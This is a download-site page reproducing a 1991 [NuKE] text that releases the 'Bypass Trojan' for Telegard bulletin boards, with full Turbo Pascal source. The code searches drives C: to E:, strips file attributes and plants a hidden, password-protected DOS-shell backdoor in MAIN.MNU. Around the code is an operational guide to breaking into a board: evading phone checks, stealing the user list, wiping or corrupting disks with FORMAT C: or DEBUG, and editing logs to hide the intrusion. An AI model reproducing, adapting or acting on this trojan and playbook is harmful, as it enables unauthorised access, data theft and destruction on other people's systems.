⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 bypass.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
💻 ASM
字号:
;****************************************************************************;
;                                                                            ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]                            [=-                     ;
;                     -=] For All Your H/P/A/V Files [=-                     ;
;                     -=]    SysOp: Peter Venkman    [=-                     ;
;                     -=]                            [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                                                                            ;
;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
;                                                                            ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
; Around Among the General Public. It Will be Very Useful for Learning how   ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
; Is. Keep This Code in Responsible Hands!                                   ;
;                                                                            ;
;****************************************************************************;
哪哪哪哪哪哪哪哪哪哪哪> Bypass Trojan v1.0 and v2.0 :

 Created by: Mechanix
 Released  : October 1991

 Introduction:

    Well this is basically another backdoor creator for Telegard Systems. This
 one is relatively fullproof except for the fact that it requires REMOTE.BAT to
 exist on the target system, or it will not function properly. However, the
 Bypass Trojan v2.0 takes care of this problem as it creates REMOTE.BAT on the
 target system, if it doesn't exist already. This is why I am also releasing
 the source (in Turbo Pascal) to the Bypass Trojan v1.0. You will find the
 source after the description.

 Description:

    This trojan will scan all directories on drives C: to E: in search of the
 MAIN.MNU file. Then it will append a few lines to the file as to create a
 hidden command to shell to DOS. It also checks to see if the MAIN.MNU file is
 Read-Only or Hidden, and will remove these attributes long enough to make the
 changes. It will also check for write-protection. The source can also be
 changed as to modify any of the .MNU files.

 Notes:

    This trojan uses a basic Turbo Pascal cycle to scan all directories and
 files, and thus the source can be modified for a number of uses. As for a good
 procedure to nail the board once the shell to DOS command has been
 implemented, I recommend the following:
  - First and foremost, use a PBX or other phreaking trick to avoid the
    annoying Maestro phone.
  - Call preferably around 4-5 am, when the SysOp is almost sure not to be
    around.
  - Use the shuttle password (if there is one) and then apply as a NEW user
    after you have bypassed the shuttle password. This will usually bypass CBV
    utilities.
  - Shell to DOS in the correct menu.
  - Turn your capture mode on, as to record everything you see.
  - Go get the user list and ZIP it up with another ZIP file that is already
    online. This way you can D/L it later when you log on again. Or capture it
    through a text file viewing utility if you find one on the system.
  - If you don't want the user list, and just want to crash the board, then
    FORMAT C: should do the trick. Or uses DEBUG to rearrange his FATs. Or if
    it's a H/P board, use one of the online virii or trojans to screw him. That
    will teach him, and you get to test them out.
  - If you decide to only take the user list and let the board live, then go
    edit the logs as to remove all evidence of your actions. If there's a spool
    to printer log, you're in trouble.
  - If you could not bypass CBV, then find that utility's log and edit out
    your number.
  - Lastly, take off the DOS shell command from the menu you modified in the
    first place, unless you want to use it again, but this is risky.

 Well that's the method I've been using, but the choice is your's.





 Source:

PROGRAM BYPASS1;
{ Bypass Trojan v1.0                                                          }
{ Created by: M顩H掞!X [NuKE]                                                 }
{ Created on: 27/09/91                                                        }
USES DOS;
VAR
 Target  : SEARCHREC;
 T       : TEXT;
PROCEDURE DIRECT   (PATH : STRING);
VAR
 PATH2    : STRING;
 INFO     : SEARCHREC;
 INFO2    : SEARCHREC;
 F        : TEXT;
BEGIN
 Findfirst (PATH + '\*.*',$10,INFO);
 WHILE DOSERROR = 0 DO
  BEGIN
   IF (INFO.ATTR = $10) AND (INFO.NAME[1] <> '.') THEN
    Begin
     PATH2 := PATH + '\' + INFO.NAME;
      Chdir (PATH2);
       Findfirst ('MAIN.MNU',($3F - $10),INFO2);       { Or any .MNU you wish }
       WHILE DOSERROR = 0 DO
        Begin
         ASSIGN (F,INFO2.NAME);
         Setfattr (F,$20);
         Append (F);
         Writeln (F,' ');
         Writeln (F,' ');
         Writeln (F,'#');                                        { Key to add }
         Writeln (F,' ');
         Writeln (F,'-$');
         Writeln (F,'NUKEWAR;PW: ;^8WRONG - access denied!');      { Password }
         Writeln (F,' ');
         Writeln (F,' ');
         Writeln (F,' ');
         Writeln (F,'#');                                        { Key to add }
         Writeln (F,' ');
         Writeln (F,'D-');
         Writeln (F,'REMOTE.BAT');
         Close (F);
         Findnext(INFO2);
       End;
      DIRECT (PATH2);
    End;
   Findnext(INFO);
  End;
 END;
PROCEDURE FILEFIND (DRIVE : CHAR);
BEGIN
 Chdir (DRIVE + ':\');
 Findfirst ('MAIN.MNU',($3F - $10),Target);            { Or any .MNU you wish }
 WHILE DOSERROR = 0 DO
  Begin
   ASSIGN (T,Target.name);
   Setfattr (T,$20);
   {$I-}
   Append (T);
   {$I+}
   IF IORESULT = 0 THEN
    Begin
     Writeln (T,' ');
     Writeln (T,'#');                                            { Key to add }
     Writeln (T,' ');
     Writeln (T,'-$');
     Writeln (T,'NUKEWAR;PW: ;^8WRONG - access denied!');          { Password }
     Writeln (T,' ');
     Writeln (T,' ');
     Writeln (T,' ');
     Writeln (T,'#');                                            { Key to add }
     Writeln (T,' ');
     Writeln (T,'D-');
     Writeln (T,'REMOTE.BAT');
     Close (T);
    End
   ELSE
    Exit;
   Findnext (Target);
  End;
 DIRECT  (DRIVE + ':');
END;
BEGIN
 {$I-}
 Chdir ('C:\');
 {$I+}
 IF IORESULT = 0 THEN
  FILEFIND ('C');
 {$I-}
 Chdir ('D:\');
 {$I+}
 IF IORESULT = 0 THEN
  FILEFIND ('D');
 {$I-}
 Chdir ('E:\');
 {$I+}
 IF IORESULT = 0 THEN
  FILEFIND ('E');
END.

    Well there it is. Please feel free to improve it in anyway you like. I will
 soon release the source to Bypass Trojan v2.0 which checks for REMOTE.BAT and
 creates one if needed. The REMOTE.BAT file also has the Hidden attribute to
 try and hide it from the SysOp. The reason for this, is that smart SysOps, and
 any of those who are reading this, rename the REMOTE.BAT or remove it, to
 avoid this sort of trojan. The original release is for a modem on Com2. If you
 wish to have the trojan for another device, either edit it in the .EXE, or
 contact me (Mechanix) on any [NuKE] board, and I will recompile the source for
 you with another device.

 Mechanix [NuKE]

;****************************************************************************;
;                                                                            ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]                            [=-                     ;
;                     -=] For All Your H/P/A/V Files [=-                     ;
;                     -=]    SysOp: Peter Venkman    [=-                     ;
;                     -=]                            [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                                                                            ;
;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
;                                                                            ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
; Around Among the General Public. It Will be Very Useful for Learning how   ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
; Is. Keep This Code in Responsible Hands!                                   ;
;                                                                            ;
;****************************************************************************;

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -